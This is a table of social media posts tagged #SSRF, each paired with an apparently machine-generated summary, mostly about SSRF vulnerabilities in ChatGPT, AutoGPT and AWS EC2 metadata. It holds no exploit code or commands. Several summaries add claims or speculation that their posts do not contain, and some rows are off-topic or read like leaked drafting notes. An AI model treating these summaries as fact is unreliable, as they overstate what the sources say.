| 414 | 2025-04-19 21:13:21 UTC | Vulnérabilités Critiques : RCE HylaFAX Bypass SQL SicommNet et SSRF AutoGPT #HylaFAX #SicommNet #AutoGPT #RCE #SQLi #SSRF #Sécurité #Vulnérabilité #AI | The content discusses critical vulnerabilities including Remote Code Execution (RCE) in HylaFAX, SQL Bypass in SicommNet, and Server-Side Request Forgery (SSRF) in AutoGPT. These vulnerabilities pose security risks and are tagged with relevant hashtags. The post emphasizes the importance of addressing these vulnerabilities promptly to enhance security. |
| 415 | 2025-04-18 05:04:18 UTC | DNSリバインディングとは? 攻撃の手法と対策を解説 #MynaviNews (Apr 17) #DNSリバインディング #SSRF #セキュリティ対策 #クラウド脅威 #内部ネットワーク保護 | The content discusses DNS rebinding, explaining the attack methods and countermeasures. It covers topics such as DNS rebinding, SSRF, security measures, cloud threats, and internal network protection. The article aims to provide insights into understanding and safeguarding against DNS rebinding attacks. |
| 416 | 2025-04-17 10:04:00 UTC | Hackers exploit SSRF flaws to access AWS EC2 metadata and IAM credentials. Learn how to stay protectedread the full blog for key insights! #Hacked #AWS #SSRF #Codecertificate | Hackers are using Server-Side Request Forgery (SSRF) vulnerabilities to access AWS EC2 metadata and IAM credentials. To protect against this threat, it is important to stay informed and take necessary precautions. The full blog provides key insights on how to safeguard your AWS environment. #Hacked #AWS #SSRF #Codecertificate. |
| 417 | 2025-04-17 05:04:21 UTC | Check out the latest article in my newsletter: API Security Alert: API7:2023 - Server Side Request Forgery (SSRF) linkedin.com/pulse/api-secu via @LinkedIn #owasp #ssrf | The content highlights an API security alert regarding Server Side Request Forgery (SSRF) with the reference API7:2023. The article can be found on LinkedIn and is shared via a newsletter. The post emphasizes the importance of API security and raises awareness about the risks associated with SSRF. The content also includes relevant hashtags like #owasp and #ssrf for visibility and categorization. |
| 418 | 2025-04-16 20:58:25 UTC | We've seen persistence in #CVE202427564 #SSRF probes for vulnerable ChatGPT servers requesting /etc/passwd and URLs using OAST domains. Increase of probes hitting Education (16.6%) and Manufacturing (8%) since Feb 2025. Details at bit.ly/4j5tvwJ | Persistent #CVE202427564 #SSRF probes target vulnerable ChatGPT servers, seeking /etc/passwd and URLs via OAST domains. Probes have surged in Education (16.6%) and Manufacturing (8%) sectors since Feb 2025. More information available at bit.ly/4j5tvwJ. |
| 419 | 2025-04-15 15:58:09 UTC | Warning: 2 high #SSRF & exposure of sensitive info to an unauthorized actor in @Auto_GPT CVE-2025-31490 CVE-2025-31491 CVSS: 8.6-7.5. An attacker can exploit these vulnerabilities to leak auth headers & private cookies. bit.ly/3RlfUFs & bit.ly/3G4YUkb #Patch | Two high-risk SSRF vulnerabilities (CVE-2025-31490, CVE-2025-31491) in @Auto_GPT pose a threat of exposing sensitive information to unauthorized actors, with CVSS scores of 8.6-7.5. Attackers can exploit these flaws to leak authentication headers and private cookies. It is crucial to apply the patch provided to mitigate these risks. |
| 420 | 2025-04-15 15:37:30 UTC | Hackers Exploiting EC2 Instance Metadata Vulnerability to Attacks Websites Hosted | Hackers are targeting websites hosted on Amazon EC2 instances by exploiting a vulnerability in the instance metadata service. This vulnerability allows attackers to gain unauthorized access to sensitive information, potentially leading to website compromise. EC2 users are advised to implement security measures to protect against these attacks, such as restricting access to the metadata service and regularly updating their systems to patch any known vulnerabilities. |
| 421 | 2025-04-15 08:58:18 UTC | Hackeando una librería anti-SSRF de Go #evasión #GO #SSRF #paranoidhttp | The content discusses hacking an anti-SSRF library in Go programming language. It involves evading security measures related to SSRF (Server-Side Request Forgery) using the Go language. The content seems to focus on exploring vulnerabilities and potential exploits in the context of SSRF protection mechanisms. The hashtag references indicate the topics covered in the content, including evasion techniques, Go programming, SSRF vulnerabilities, and paranoid HTTP practices. |
| 422 | 2025-04-14 19:58:21 UTC | 1. First I need to parse the original content. The user's message is about discovering SSRF vulnerabilities using AutoRepeater. The steps are divided into sections: introduction download/install automatic discovery and blind SSRF. #ssrf #bugbountytips | The content discusses discovering SSRF vulnerabilities with AutoRepeater in steps: parsing original content, introduction, download/install, automatic discovery, and blind SSRF. It highlights the process and sections involved in identifying SSRF vulnerabilities. The content is tagged with #ssrf and #bugbountytips. |
| 423 | 2025-04-14 17:53:40 UTC | 5. Blind SSRF section is about testing methods. The user encourages fuzzing parameters and persistence. Keep the motivational tone with "bro" as in the original. #ssrf #bugbountytips | The content discusses testing methods for Blind SSRF, emphasizing fuzzing parameters and persistence. It encourages a motivational tone using "bro" and includes hashtags #ssrf and #bugbountytips. |
| 424 | 2025-04-14 17:53:39 UTC | 2. For the first tweet the summary I have to condense the main points. The key points are using AutoRepeater DNS logging platforms regex patterns and exploiting blind SSRF. I need to make sure it's concise and under 140 chars. #ssrf #bugbountytips | The tweet discusses using AutoRepeater, DNS logging platforms, regex patterns, and exploiting blind SSRF. The focus is on condensing key points for a concise summary under 140 characters. #ssrf #bugbountytips. |
| 425 | 2025-04-14 17:53:39 UTC | How I Auto-Discovering SSRF on Hackerone Program #ssrf #bugbountytips #bugbountytip #hackers | The content discusses a method for automatically discovering Server-Side Request Forgery (SSRF) vulnerabilities on a Hackerone program. It likely includes tips and techniques for bug bounty hunters interested in finding SSRF issues. The content may provide insights into how to identify and exploit SSRF vulnerabilities effectively. The link provided likely leads to more detailed information on the topic. |
| 426 | 2025-04-14 10:53:46 UTC | New critical SSRF vulnerability (CVE-2025-3572) discovered in INTUMIT SmartRobot. No auth required internal networks at risk. Patch now. #CyberSecurity #SSRF #Infosec #CVE20253572 | A new critical SSRF vulnerability (CVE-2025-3572) has been found in INTUMIT SmartRobot, putting internal networks at risk without authentication. It is advised to patch the vulnerability immediately to prevent potential cyber threats. The discovery highlights the importance of cybersecurity measures and staying informed about vulnerabilities like SSRF. #CyberSecurity #SSRF #Infosec #CVE20253572. |
| 427 | 2025-04-13 14:48:47 UTC | Dr Stefano Cattaneo did a great job presenting #SSRF guidelines - and even mentioned his prior scapula training by #CWIS expert @peter_a_cole! Amazing! @estesonline #ECTES2025 | Dr. Stefano Cattaneo presented #SSRF guidelines and highlighted his prior scapula training by #CWIS expert Peter A. Cole. The presentation was well-received at the @estesonline #ECTES2025 event. |
| 428 | 2025-04-11 14:38:27 UTC | A recent campaign exploited #SSRF #vulnerabilities in EC2-hosted websites to access EC2 Metadata potentially exposing IAM credentials. This could lead to unauthorized access to S3 buckets and other #AWS services. #ThreatIntelligence #CyberSecurity | A recent campaign exploited #SSRF vulnerabilities in EC2-hosted websites to access EC2 Metadata, potentially exposing IAM credentials. This could lead to unauthorized access to S3 buckets and other AWS services. The exploitation highlights a significant security risk and emphasizes the importance of addressing vulnerabilities promptly to prevent unauthorized access and potential data breaches. #ThreatIntelligence #CyberSecurity. |
| 429 | 2025-04-11 11:43:17 UTC | Just crushed the #SSRF module on @TryHackMe! Eager to dive into #cybersecurity as an intern. If anyones got a chance for a passionate learner Im all in! #internship #pentesting #hacking | The content highlights the completion of the SSRF module on TryHackMe and expresses eagerness to pursue cybersecurity as an intern. The individual is enthusiastic about learning and seeking opportunities in penetration testing and hacking. They are open to internships and eager to grow in the field. |
| 430 | 2025-04-11 08:38:09 UTC | A recent SSRF attack campaign targeted Amazon EC2 instance metadata via unsecured websites aiming to steal sensitive IAM credentialsvia Laura French on SC Media #aws #AWSCloud #EC2 #SSRF #CyberSecurity #IAM #IMDSv2 | A recent SSRF attack campaign focused on accessing Amazon EC2 instance metadata through unsecured websites to steal sensitive IAM credentials. The attack aimed to exploit vulnerabilities in AWS services, highlighting the importance of cybersecurity measures like IMDSv2. The incident underscores the ongoing threat of SSRF attacks and the need for vigilance in protecting cloud resources. |
| 431 | 2025-04-10 23:31:41 UTC | Amazon EC2 instance metadata targeted in SSRF attacks | Amazon EC2 instance metadata is being targeted in Server-Side Request Forgery (SSRF) attacks. This vulnerability allows attackers to access sensitive information stored in the instance metadata, potentially leading to data breaches or unauthorized access. It is crucial for users to implement security measures to protect against SSRF attacks, such as restricting access to the instance metadata and regularly updating security configurations. |
| 432 | 2025-04-10 20:38:27 UTC | #Hackers target a number of #SSRF bugs in #EC2-hosted sites to steal #AWS credentials. #Cybersecurity #infosec #cybercrime | Hackers are exploiting SSRF vulnerabilities in EC2-hosted sites to steal AWS credentials, posing a cybersecurity threat. This cybercrime trend highlights the importance of addressing security flaws in cloud services to protect sensitive information. |
| 433 | 2025-04-10 16:38:27 UTC | Hackers Apuntan a Vulnerabilidades SSRF en Sitios Web Alojados en EC2 para Robar Credenciales de AWS ciberninjas.com/hackers-apunta #SSRF #AWS #EC2 #Ciberseguridad #Hackers #Vulnerabilidades #RoboDeCredenciales #SeguridadWeb #CloudSecurity #CiberAmenazas | Hackers are targeting SSRF vulnerabilities in websites hosted on EC2 to steal AWS credentials. The focus is on cybersecurity, hackers, vulnerabilities, credential theft, web security, cloud security, and cyber threats. The link provided likely offers more details on this issue. |
| 434 | 2025-04-10 13:46:13 UTC | Hackers attempted to steal AWS credentials using SSRF flaws within hosted sites | Hackers targeted AWS credentials through SSRF vulnerabilities in hosted websites. The attackers exploited these flaws to try and gain access to sensitive AWS credentials. SSRF flaws allowed the hackers to manipulate the server into making unauthorized requests, potentially leading to data breaches or unauthorized access to AWS resources. This incident highlights the importance of securing websites against SSRF vulnerabilities to prevent unauthorized access and protect sensitive data stored on cloud platforms like AWS. |
| 435 | 2025-04-10 11:38:09 UTC | AWS EC2 instances under fire! New F5 Labs research reveals a targeted SSRF campaign exploiting EC2 Metadata to steal IAM credentials. Is your cloud setup secure? Time to check your defenses! #CloudSecurity #SSRF #AWS | New F5 Labs research uncovers a targeted SSRF campaign exploiting AWS EC2 Metadata to steal IAM credentials, raising concerns about cloud security. Users are urged to assess their defenses to safeguard against potential threats. #CloudSecurity #SSRF #AWS |
| 436 | 2025-04-10 08:33:16 UTC | Clear Life Obstacles: Mantra for Family and Finance with Sadguru Cyriaque Vallee ( April 10 9:30 PM ) #LCDLFAllStars #Survivor2025 #Bayburt #SEVENTEEN #AshleyOgle #SanatanSanstha #SSRF #mahavirjayanti2025 #ChantingMeditation #SpiritualGrowth | Join Sadguru Cyriaque Vallee on April 10 at 9:30 PM for a session on clearing life obstacles with mantras for family and finance. The event focuses on spiritual growth through chanting meditation. Use hashtags like #LCDLFAllStars and #Survivor2025 to engage with the event. |
| 437 | 2025-04-10 00:33:58 UTC | #Hackers #target #SSRF #Bugs in #EC2-#Hosted #sites to #steal #AWS #credentials | Hackers are exploiting Server-Side Request Forgery (SSRF) bugs in EC2-hosted websites to access and steal AWS credentials. This vulnerability allows attackers to manipulate a web application's requests to access internal resources, potentially leading to data breaches or unauthorized access to sensitive information stored on AWS. Organizations hosting websites on EC2 instances should be vigilant in monitoring and patching vulnerabilities to prevent unauthorized access and protect their AWS credentials from being compromised. |
| 438 | 2025-04-10 00:33:57 UTC | Hackers target SSRF bugs in EC2 hosted sites to steal AWS credentials. Protect your AWS environment: #cybersecurity #SSRF #AWS #AWSsecurity | Hackers are exploiting Server-Side Request Forgery (SSRF) vulnerabilities in EC2 hosted sites to steal AWS credentials. It is crucial to safeguard your AWS environment against such attacks by implementing robust cybersecurity measures. Stay vigilant and prioritize AWS security to prevent unauthorized access and protect sensitive data. #cybersecurity #SSRF #AWS #AWSsecurity |
| 439 | 2025-04-09 22:11:18 UTC | Hackers target SSRF bugs in EC2-hosted sites to steal AWS credentials | Hackers are exploiting Server-Side Request Forgery (SSRF) vulnerabilities in Amazon EC2-hosted websites to steal AWS credentials. SSRF bugs allow attackers to send requests from the server to other internal resources, potentially accessing sensitive information like AWS credentials. This type of attack poses a significant risk to organizations hosting their sites on EC2 instances. It is crucial for website owners to regularly update and secure their systems to prevent such attacks and protect their AWS credentials from being compromised. |
| 440 | 2025-04-09 21:33:23 UTC | Hackers target #SSRF bugs in #EC2-hosted sites to steal #AWS credentials scyscan.com/news/hackers-t | Hackers are exploiting Server-Side Request Forgery (SSRF) vulnerabilities in Amazon EC2-hosted websites to steal AWS credentials. This security threat allows hackers to manipulate a server into making unauthorized requests, potentially leading to data breaches or unauthorized access. It is crucial for EC2-hosted sites to address and patch these vulnerabilities to prevent the theft of AWS credentials and protect sensitive information. |
| 441 | 2025-04-09 05:28:18 UTC | New Writeup Alert! "Pentathon 2025 Web ChallengeUnblocker" by Vedant Pillai is now live on IW! Check it out here: #ssrf #ctfwriteup #cybersecurity #ethicalhacking #ctf | A new writeup titled "Pentathon 2025 Web Challenge — Unblocker" by Vedant Pillai is available on IW. The writeup focuses on cybersecurity topics such as SSRF, ethical hacking, and CTF. Readers are encouraged to check it out for insights into these areas. The link provided directs to the content for further exploration. |
| 442 | 2025-04-07 13:28:30 UTC | Understand What is Server Side Request Forgery (SSRF). Cover its all types impact and How to Defend Against Server-Side Request Forgery? #SSRF #SSRFAttacks #SoftwareSecurity | The content discusses Server-Side Request Forgery (SSRF), explaining its types, impact, and defense strategies. It aims to raise awareness about SSRF attacks and the importance of software security. The focus is on understanding the threat posed by SSRF, its potential impacts, and ways to protect against such vulnerabilities. The content encourages readers to be vigilant and take proactive measures to defend their systems against SSRF attacks. |
| 443 | 2025-04-07 11:28:39 UTC | Critical CVE-2025-32013 alert: An SSRF flaw in LNbits could expose internal systems via manipulated callback URLs. CVSS 9.3. Immediate action is advised. Details: threatsbank.com/critical-ssrf- #CyberSecurity #CVE2025 #SSRF #LNbits | A critical CVE-2025-32013 alert warns of an SSRF flaw in LNbits that could expose internal systems through manipulated callback URLs, with a CVSS score of 9.3. Immediate action is recommended. For more details, visit threatsbank.com/critical-ssrf-. #CyberSecurity #CVE2025 #SSRF #LNbits. |
| 444 | 2025-04-06 05:13:37 UTC | SSRF Cloud token theft Full cloud compromise. #BugBounty #CloudSecurity #SSRF #EthicalHacking | The content discusses a security vulnerability known as Server-Side Request Forgery (SSRF) that can lead to cloud token theft and full cloud compromise. It emphasizes the importance of Bug Bounty programs, Cloud Security, SSRF awareness, and Ethical Hacking practices to address and prevent such vulnerabilities. The content aims to raise awareness about the risks associated with SSRF and the potential impact on cloud security. |
| 445 | 2025-04-05 21:13:33 UTC | Cultivating a new bash script that handles custom SSRF Payloads User Agents and Content types for testing SSRF Injections! Full version should be on my GitHub by end of the week! #hack #hackers #Hackingtime #Pentesting #SSRF #BugBounty #cybersec | A new bash script is being developed to handle custom SSRF payloads, user agents, and content types for testing SSRF injections. The full version will be available on GitHub by the end of the week. The project aims to assist in testing SSRF vulnerabilities and is relevant to hacking, pentesting, bug bounty, and cybersecurity communities. #hack #hackers #Hackingtime #Pentesting #SSRF #BugBounty #cybersec. |
| 446 | 2025-04-05 12:13:20 UTC | New Writeup Alert! " SSRF to RCE: How I Turned a Small Bug Into a Big Paycheck" by Abhijeet Kumawat is now live on IW! Check it out here: infosecwriteups.com/574b6b889d2a #hacking #ssrf #rce #bugbounty #cybersecurity | Abhijeet Kumawat's new writeup on turning a small bug into a big paycheck through SSRF to RCE is now available on IW. The content discusses hacking, SSRF, RCE, bug bounty, and cybersecurity. Readers can find the detailed writeup at infosecwriteups.com/574b6b889d2a. |
| 447 | 2025-04-04 21:08:28 UTC | A message from our CEO @DRtheNerd: #SSRF attacks are highly advanced but with #ZeroTrust implementations threat actors are ensured to be denied access into servers. Learn how ADAMnetworks implements Zero Trust measures to detect these risks: bit.ly/3KpoIXc | The CEO highlights the sophistication of SSRF attacks but emphasizes that Zero Trust measures can prevent access to servers. ADAMnetworks implements Zero Trust to detect these risks effectively. The message underscores the importance of Zero Trust in cybersecurity to counter advanced threats like SSRF attacks. The provided link likely offers more details on how ADAMnetworks utilizes Zero Trust to enhance security measures. |
| 448 | 2025-03-31 16:58:44 UTC | تحذير أمني: استغلال ثغرات SSRF متصاعد! GreyNoise تكشف عن زيادة في الهجمات عبر الخوادم تصل إلى 400 عنوان IP نشط. الهجمات تستهدف شركات تقنية وتزيد من مخاطر تسرب البيانات. كيف تتأثر وكيف تحمي نفسك توجيهات وتفاصيل: #الأمن_السيبراني #SSRF | GreyNoise reports a rise in SSRF vulnerabilities exploitation, with attacks targeting tech companies and posing data leakage risks. Up to 400 active IP addresses are involved. Guidance on how these attacks impact and how to protect oneself is provided. The content emphasizes cybersecurity awareness and protection against SSRF threats. |
| 449 | 2025-03-30 09:48:49 UTC | I just published Day 8 API-072023 Server Side Request Forgery #CyberSecurity #SSRF #APISecurity #OWASP #ThreatIntelligence #Infosec #BugBounty #API7 #CyberDefense #SecurityBestPractices #TechBlog #CyberAwareness #DigitalForensics #IncidentResponse | The content is about a publication on Day 8 API-07-2023 focusing on Server Side Request Forgery in the context of cybersecurity. The post includes hashtags related to cybersecurity topics such as SSRF, APISecurity, OWASP, ThreatIntelligence, Infosec, BugBounty, CyberDefense, SecurityBestPractices, TechBlog, CyberAwareness, DigitalForensics, and IncidentResponse. The link provided directs to the published content. |
| 450 | 2025-03-28 23:43:32 UTC | #ServerSideRequestForgery (#SSRF) is a critical web app #vulnerability that can compromise your systems. Attackers can exploit it to gain unauthorized access to internal networks potentially exposing sensitive data or executing malicious code. cybernewslive.com/server-side-re | #ServerSideRequestForgery (#SSRF) is a dangerous web app vulnerability that allows attackers to access internal networks, potentially leading to data exposure or malicious code execution. This vulnerability can compromise systems and must be addressed to prevent unauthorized access and protect sensitive information. Cybersecurity measures are crucial to mitigate the risks associated with SSRF attacks. |
| 451 | 2025-03-28 05:38:23 UTC | #Cycatz #cybersecurity SSRF Leads to RCE More... shorturl.at/i4LG8 #cyberattacksurfacemanagement #darkwebmonitoring #SurfaceWebMonitoring #mobilesecurity #mailsecurity #cloudsecurity #grc #riskregister #vendorriskmanagement #brandmonitoring #incedentreport #bug #SSRF #RCE | The content discusses cybersecurity topics such as SSRF leading to RCE, cyber attack surface management, dark web monitoring, mobile security, cloud security, risk management, vendor risk, brand monitoring, incident reporting, and bugs. It emphasizes the importance of these areas in maintaining security and preventing cyber threats. The link provided likely leads to further information on these topics. |
| 452 | 2025-03-27 06:33:37 UTC | Server-Side Request Forgery (SSRF) is often underestimated but it can lead to severe consequencesincluding Remote Code Execution (RCE). Read here: #CyberSecurity #SSRF #RCE #EthicalHacking #hackingtips | Server-Side Request Forgery (SSRF) is a serious security threat that is often underestimated. It can result in severe consequences, such as Remote Code Execution (RCE). This highlights the importance of understanding and addressing SSRF vulnerabilities to prevent potential cyber attacks. The content emphasizes the significance of cybersecurity, SSRF, RCE, ethical hacking, and provides hacking tips. |
| 453 | 2025-03-25 11:26:11 UTC | Positive Technologies helps fix a vulnerability in Veeam Service Provider Console | Positive Technologies assisted in addressing a vulnerability found in the Veeam Service Provider Console. The vulnerability was identified and resolved with the help of Positive Technologies. The collaboration between the two entities resulted in fixing the security flaw in the Veeam Service Provider Console. |
| 454 | 2025-03-24 15:23:54 UTC | New Writeup Alert! "SSRF Advanced Methodology" by Abhijeet Kumawat is now live on IW! Check it out here: #hacking #bugbounty #methodology #ssrf #infosec | Abhijeet Kumawat's new writeup "SSRF Advanced Methodology" is now available on IW, focusing on hacking, bug bounty, methodology, SSRF, and infosec. The content provides insights into advanced SSRF techniques. Readers interested in cybersecurity and exploiting SSRF vulnerabilities can find valuable information in this writeup. |
| 455 | 2025-03-24 00:18:46 UTC | 2024 CWE Top 25 Most #Dangerous_Software_Weaknesses: #Server_Side_Request_Forgery #SSRF CWE-918 | The content discusses the 2024 CWE Top 25 Most Dangerous Software Weaknesses, highlighting Server Side Request Forgery (SSRF) as a critical vulnerability (CWE-918). This weakness can allow attackers to manipulate server requests, potentially leading to unauthorized access or data leaks. Organizations should prioritize addressing SSRF vulnerabilities to enhance their cybersecurity defenses. |
| 456 | 2025-03-24 00:18:45 UTC | 2024 CWE Top 25 Most #Dangerous_Software_Weaknesses: #Server_Side_Request_Forgery #SSRF CWE-918 | The content discusses the 2024 CWE Top 25 Most Dangerous Software Weaknesses, highlighting Server-Side Request Forgery (SSRF) as a critical vulnerability (CWE-918). This weakness can allow attackers to manipulate server requests, potentially leading to unauthorized access or data leakage. Organizations should prioritize addressing SSRF vulnerabilities to enhance their cybersecurity defenses and protect sensitive information from exploitation. |
| 457 | 2025-03-23 18:18:46 UTC | When you see payloads like this with URL the next thing to look out for (vulnerability) should be #SSRF Don't ignore the signs. | The content highlights the importance of being cautious when encountering payloads with URLs, suggesting that the next vulnerability to watch for is Server-Side Request Forgery (SSRF). It emphasizes not ignoring such signs to prevent potential security risks. The provided URL example serves as a reminder to be vigilant and proactive in identifying and addressing vulnerabilities like SSRF. |
| 458 | 2025-03-21 22:13:13 UTC | Big warning from GreyNoise: Over 400 IPs exploiting SSRF vulnerabilities in GitLab VMware and more. Patch up monitor traffic and stay vigilant! #CyberSecurity #SSRF #ThreatIntelligence #PatchNow | GreyNoise issued a warning about 400+ IPs exploiting SSRF vulnerabilities in GitLab, VMware, and other systems. They advise patching up vulnerabilities, monitoring traffic, and staying vigilant for potential threats. This highlights the importance of cybersecurity measures and prompt patching to mitigate risks. #CyberSecurity #SSRF #ThreatIntelligence #PatchNow |
| 459 | 2025-03-21 10:08:35 UTC | @starkcharry Ive confirmed HTTP interactions on a blind SSRF in a BBP target and exploring escalation to RCE. Since youve shared great insights on SSRF exploitation before Id love to collaborate on this. Let me know if you're interested! #BugBounty #SSRF #Pentesting | The content mentions confirming HTTP interactions on a blind SSRF vulnerability in a BBP target and exploring escalation to Remote Code Execution (RCE). The author seeks collaboration with @starkcharry, who has expertise in SSRF exploitation. They express interest in working together on this and invite @starkcharry to join. The post includes relevant hashtags like #BugBounty, #SSRF, and #Pentesting. |
| 460 | 2025-03-20 23:36:12 UTC | Hackers Are Using ChatGPT Bug to Access Sensitive Data | Hackers are exploiting a bug in ChatGPT to gain access to sensitive data. The bug is being used to breach security measures and extract confidential information. This vulnerability poses a significant threat to privacy and data security. It is crucial for users and developers to be aware of this issue and take necessary precautions to protect their data from potential breaches. |
| 461 | 2025-03-20 12:21:23 UTC | ChatGPT Vulnerability Exploited Against US Government Organizations | The ChatGPT vulnerability was exploited against US government organizations. The details of the exploit and its impact are not provided in the summary. |
| 462 | 2025-03-20 05:03:12 UTC | Over 400 IPs exploiting SSRF vulnerabilities like CVE-2020-7796 & CVE-2021-22175. Patch up monitor traffic and stay vigilant! #CyberSecurity #SSRF #ThreatIntelligence #PatchNow | Over 400 IPs are exploiting SSRF vulnerabilities such as CVE-2020-7796 & CVE-2021-22175. It is crucial to patch up systems, monitor traffic, and remain vigilant to prevent cyber threats. The post emphasizes the importance of cybersecurity, threat intelligence, and immediate patching to address these vulnerabilities. Stay proactive and protect your systems. #CyberSecurity #SSRF #ThreatIntelligence #PatchNow. |
| 463 | 2025-03-19 21:51:18 UTC | US Primarily Targeted By Attacks Leveraging ChatGPT Vulnerability | The United States is the main target of cyber attacks exploiting vulnerabilities in ChatGPT technology. This vulnerability poses a significant risk to US entities and individuals. The attacks are specifically designed to exploit weaknesses in ChatGPT, a popular chatbot technology. It is crucial for US organizations and users to be vigilant and take necessary precautions to protect themselves from potential cyber threats leveraging this vulnerability. |
| 464 | 2025-03-19 19:03:28 UTC | #ThreatProtection #CVE-2024-27564 - #ChatGPT commit f9f4bbc #SSRF #vulnerability exploited in the wild read more about Symantec's protection: broadcom.com/support/securi | The content highlights a specific vulnerability (#CVE-2024-27564) in the #ChatGPT software, related to Server-Side Request Forgery (#SSRF), being exploited in the wild. It directs readers to learn more about Symantec's protection against this vulnerability on broadcom.com/support/securi. The post emphasizes the importance of threat protection and staying informed about potential security risks. |
| 465 | 2025-03-19 19:03:27 UTC | Check those common parameters could be vulnerable SSRF... For more follow ...DarkShadow... #ssrf #bugbountytips | The content discusses the importance of checking common parameters for potential SSRF vulnerabilities. It suggests following DarkShadow for more insights and tips related to SSRF and bug bounty hunting. The post emphasizes the significance of being vigilant about common parameters to identify and address SSRF vulnerabilities effectively. |
| 466 | 2025-03-19 14:41:35 UTC | Actively Exploited ChatGPT Bug Puts Organizations at Risk | A critical bug in ChatGPT is being exploited, posing risks to organizations. The bug is actively targeted, potentially leading to security breaches. Organizations using ChatGPT should be cautious and take immediate action to mitigate the threat. |
| 467 | 2025-03-19 11:58:42 UTC | #ChatGPT #SSRF #Vulnerabilities #bug quickly becomes a favorite #attack_vector vapt.me/GPT-SSRF | The content discusses the emergence of a vulnerability in #ChatGPT related to Server-Side Request Forgery (#SSRF), which has become a popular attack vector. The link provided likely leads to more details about this vulnerability and its implications. |
| 468 | 2025-03-19 10:03:10 UTC | #AI: A year-old Server-Side Request Forgery (#SSRF) vulnerability in #ChatGPT pictureproxy.php file (CVE-2024-27564) is actively exploited against financial entities & government organisations; | A Server-Side Request Forgery (SSRF) vulnerability in the ChatGPT pictureproxy.php file (CVE-2024-27564) is being actively exploited against financial entities and government organizations. This year-old vulnerability poses a security risk and is being used maliciously. More information can be found at the provided link. |
| 469 | 2025-03-19 05:01:35 UTC | Hackers Exploit ChatGPT with CVE-2024-27564 10000 Attacks in a Week | Hackers have targeted ChatGPT using CVE-2024-27564, launching over 10,000 attacks within a week. This vulnerability has been exploited by hackers to compromise the system. The attacks on ChatGPT highlight the importance of addressing security vulnerabilities promptly to prevent unauthorized access and data breaches. |
| 470 | 2025-03-19 00:53:36 UTC | ChatGPT SSRFバグは急速に攻撃の標的に ChatGPT SSRF bug quickly becomes a favorite attack vector #BleepingComputer (Mar 18) ChatGPTのSSRF脆弱性CVE-2024-27564が金融機関や米国政府機関への攻撃に利用されているとの報告があります#ChatGPT記事要約 #SSRF #ChatGPT脆弱性 | The ChatGPT SSRF bug (CVE-2024-27564) is being exploited in attacks against financial institutions and US government agencies. This vulnerability has quickly become a popular attack vector. Reports indicate that the vulnerability is actively being used for malicious purposes. #SSRF #ChatGPT脆弱性 |
| 471 | 2025-03-18 16:52:04 UTC | ChatGPT SSRF bug quickly becomes a favorite attack vector | The ChatGPT SSRF bug has become a popular attack vector due to its vulnerability. SSRF (Server-Side Request Forgery) allows attackers to make requests from a server, potentially accessing sensitive information or executing malicious actions. This bug's exploitation poses a significant security risk, making it a favorite target for attackers seeking unauthorized access to systems. |
| 472 | 2025-03-18 15:58:20 UTC | @VeritiSecurity #ChatGPT #SSRF bug quickly becomes a favorite attack vector #securityaffairs #hacking #malware | The @VeritiSecurity #ChatGPT #SSRF bug has gained popularity as an attack vector in the realm of security affairs, hacking, and malware. This vulnerability is being exploited by malicious actors, highlighting the importance of addressing and mitigating such security risks promptly. |
| 473 | 2025-03-18 15:58:19 UTC | #ChatGPT #SSRF bug quickly becomes a favorite attack vector #securityaffairs #hacking #malware | The #ChatGPT #SSRF bug has emerged as a popular attack method in the cybersecurity realm. This vulnerability is gaining traction among hackers and malware creators. The bug's exploitation poses a significant threat to security, making it a favored attack vector. The issue is being discussed within the cybersecurity community, highlighting the importance of addressing and mitigating this vulnerability promptly. |
| 474 | 2025-03-18 14:21:47 UTC | ChatGPT Vulnerability Actively Exploited From 10000 IPs to Attack US Government Organizations | A vulnerability in ChatGPT was exploited by over 10,000 IP addresses to launch attacks on US government organizations. The breach allowed unauthorized access to sensitive information, posing a significant security threat. The incident highlights the importance of addressing vulnerabilities promptly to prevent malicious exploitation and protect critical systems from cyber attacks. |
| 475 | 2025-03-18 13:07:13 UTC | Hackers Exploit SSRF Vulnerability to Attack OpenAIs ChatGPT Infrastructure | Hackers targeted OpenAI's ChatGPT infrastructure by exploiting a Server-Side Request Forgery (SSRF) vulnerability. This vulnerability allowed attackers to manipulate the server into making requests on their behalf, potentially leading to unauthorized access or data theft. The attack highlights the importance of addressing and securing SSRF vulnerabilities to protect sensitive systems and data from malicious exploitation. |
| 476 | 2025-03-18 03:48:38 UTC | New CWIS Research Alert! When should acute surgical stabilization of rib fractures be considered? Latest review explores key indications & timing to improve outcomes in rib fracture management. Read more here: pubmed.ncbi.nlm.nih.gov/40079510/ #CWISmemberresearch #SSRF | A new CWIS research review discusses the indications and timing for acute surgical stabilization of rib fractures to enhance outcomes in rib fracture management. The study aims to provide insights on when this intervention should be considered. For more details, the full review can be accessed at pubmed.ncbi.nlm.nih.gov/40079510/. #CWISmemberresearch #SSRF |
| 477 | 2025-03-14 09:38:30 UTC | Experts warn of a coordinated surge" in the exploitation attempts of #SSRF flaws securityaffairs.com/175344/hacking #securityaffairs #hacking | Security experts are cautioning about a significant increase in coordinated exploitation attempts targeting #SSRF flaws. This surge poses a heightened risk to systems vulnerable to these security weaknesses. The warning highlights the importance of addressing and patching these vulnerabilities promptly to prevent potential security breaches and unauthorized access to sensitive information. |
| 478 | 2025-03-14 01:34:11 UTC | Experts warn of a coordinated surge in SSRF exploitation attempts with around 400 IPs targeting multiple vulnerabilities across platforms highlighting a concerning trend in reconnaissance-driven attacks. #CyberSecurity #SSRF | Experts are cautioning about a rise in SSRF exploitation attempts involving 400 IPs targeting various vulnerabilities across platforms, indicating a troubling trend in reconnaissance-driven attacks. This highlights the importance of cybersecurity measures to prevent such threats. #CyberSecurity #SSRF |
| 479 | 2025-03-13 15:47:04 UTC | Experts warn of a coordinated surge in the exploitation attempts of SSRF vulnerabilities | Experts are cautioning about a rise in coordinated exploitation attempts targeting SSRF vulnerabilities. This warning highlights the increasing threat posed by attackers who are actively seeking to exploit these vulnerabilities. It underscores the importance of addressing and securing SSRF vulnerabilities to prevent potential breaches and protect systems from malicious activities. |
| 480 | 2025-03-13 15:33:25 UTC | @GreyNoiseIO Experts warn of a coordinated surge" in the exploitation attempts of #SSRF flaws #securityaffairs #hacking | Experts from GreyNoiseIO have issued a warning about a coordinated surge in exploitation attempts targeting SSRF flaws. This poses a significant risk to security, as SSRF vulnerabilities can be exploited by hackers for malicious activities. The increase in these exploitation attempts highlights the importance of addressing and patching SSRF vulnerabilities to protect against potential security breaches. |
